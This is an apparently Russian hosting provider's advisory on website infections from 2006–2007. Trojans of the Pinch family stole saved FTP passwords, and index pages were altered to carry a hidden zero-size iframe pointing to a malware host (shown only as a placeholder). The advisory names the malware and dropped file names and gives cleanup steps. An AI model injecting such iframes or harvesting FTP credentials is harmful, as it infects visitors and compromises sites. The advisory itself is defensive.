Началась подобная эпидемия в конце 2006 — начале 2007 года владельцы сайтов столкнулись с неприятной ситуацией. При открытии индексной страницы сайта (хостинг значение не имеет, платный или бесплатный) на компьютер начинал подгружаться вирус-троян. Оказывается, в код страницы были внесены изменения — добавлена ссылка на сайт-вирусоноситель, с которого собственно и загружался троян. Некоторые индексные страницы вообще «стирались», то есть, на них не оставалось ни одного тега, в итоге виден был просто чистый лист бумаги :).

Соответственно прокатилась волна претензий и обвинений к хостерам, из-за «взлома» хостов пользователей, которое приняло такие масштабы, что впору было обвинять именно хостеров, однако они тут не причем, это практически в 99% выяснялось при анализе системных журналов.

Суть вносимых изменений заключается в том, что на странице index.html (или index.php, и т.п.) появляется следующий участок кода:

iframe src=http://ссылка_на_вредоносный_сайт_содержащий_вирус

Тег iframe как правило со значением width="0" и height="0", это означает, что Вы не увидите открывающееся окно «левого» сайта, поскольку заданы нулевые координаты этого окна. В последних версиях этот тег всячески маскируется по средствам BASE64 кодирования, что бы при беглом обзоре кода не заметить, а в некторых случаях известны и заражения через DIV тэги.

Анализ механизма заражения сайта показал следующий результат. Индексные страницы менялись посредством FTP ЛЕГАЛЬНОГО подключения, т. е. никакого взлома сайта не производилось, а всего лишь осуществлялся вход по логину/паролю и последующая модификация файлов сайта. После более детального изучения выяснилось, что подобное поведение присуще Trojan'ской программе семейства Pinch, которая умеет обходить брандмауэры и антивирусные программы и похищает все к чему может дотянуться, в том числе пароли, сохраненные в IE, CuteFTP, Total Commander и еще десятке различных программ.

Само заражение происходит следующим образом:

1.Сначала загружается Trojan-Downloader.VBS. Psyme.fc — троянская программа-загрузчик других троянов, в последнее время название несколько раз изменялось.

2.Именно она подгружает еще два вируса — Trojan-PSW.Win32.LdPinch.bik (или модификация) и Trojan.Win32.Agent.oh (не обязательно).

Самое интересное, что как DrWeb, и впоследствии установленный после него Антивирус KAV, определяли, что на компьютер закачивается троян и его ликвидировали. Один ньюанс: с самого начала загрузки файлов с зараженного сайта на рабочем столе создавался и выполнялся файл new.exe. В папке windows появлялись файлы названиями r.exe или c.exe, которые антивирусом не опознавались как опасные. По свидетельствам других пользователей в папке Windows мог создаваться поддельный файл с названием svchost.exe (оригинал находится в папке System32). Тогда в процессах операционной системы трудно определить, какой из процессов, используемых программой svchost.exe есть истинный, а какой поддельный. Если у Вас стоит это ПО а такой тег появился, то вполне возможно, что запущена или модификация этого вируса, которая успевает обойти антивирус, или работает другой вирус, с похожим алгоритмом. Есть еще вариант, причем очень вероятный. Используемая программа-троян принадлежит к руткитам (программам, внедряемым в ядро операционной системы), которые трудно обнаруживаются антивирусами. Или используется уязвимость Internet Explorer 6. Вот как о ней писалось: Удаленный пользователь может с помощью специально сформированной Web страницы загрузить на удаленную систему произвольный HTA файл и затем выполнить его с привилегиями пользователя, запустившего браузер. Удачная эксплуатация уязвимости позволит злоумышленнику выполнить произвольный код на целевой системе.

Если с Вами произошла эта неприятность:

1.Полная проверка своего компьютера на вирусы, spyware, трояны и прочее вредоносное ПО антивирусом с последними обновлениями, для верности желательно использовать антивирусное ПО нескольких производителей.

2.Смена паролей доступа к всем ftp аккаунтам, cPanel, биллингу, если Вы не можете самостоятельно их поменять, тогда Вам следует обратиться в службу технической поддержки, которая генерирует и вышлет Вам новый пароль на доверительный email.

3.Восстановление сайта из резервных копий (которые Вы должны периодически делать), если у Вас их нет Вы можете так же обратиться в отдел технической поддержки с запросом на восстановление данных, но помните, что наша компания производит резервное копирование на случай сбоя оборудования по графику неделя/месяц и потому в резервной копии может храниться уже зараженная версия сайта.

4.Никогда не сохраняйте пароли в программах, если не уверены в своей памяти, запишите на отдельный носитель например бумажку :) хоть это и не верно с точки зрения информационной безопасности, зато вирусы не достанут.
5.Не передавайте пароли от ftp аккаунтов другим лицам, если все же такое случилось передайте тем людям эти рекомендации, так как утечка паролей могла произойти с их компьютеров.

6.Так как поиск уязвимостей хакерами ориентирован на Internet Explorer, есть компромиссный вариант: использовать альтернативный браузер, не базирующийся на платформе IE. Это Firefox (огненная лиса) на движке Mozilla. Но 100% гарантии это не дает.

Так же наша компания в подобном случае может предоставить вырезки из системных журналов ftp подключений по вашему запросу, где как правило содержаться периодические входы через ftp и подгрузка зараженных страниц.

Источник: http://www.multihost.ru/articles/7.htm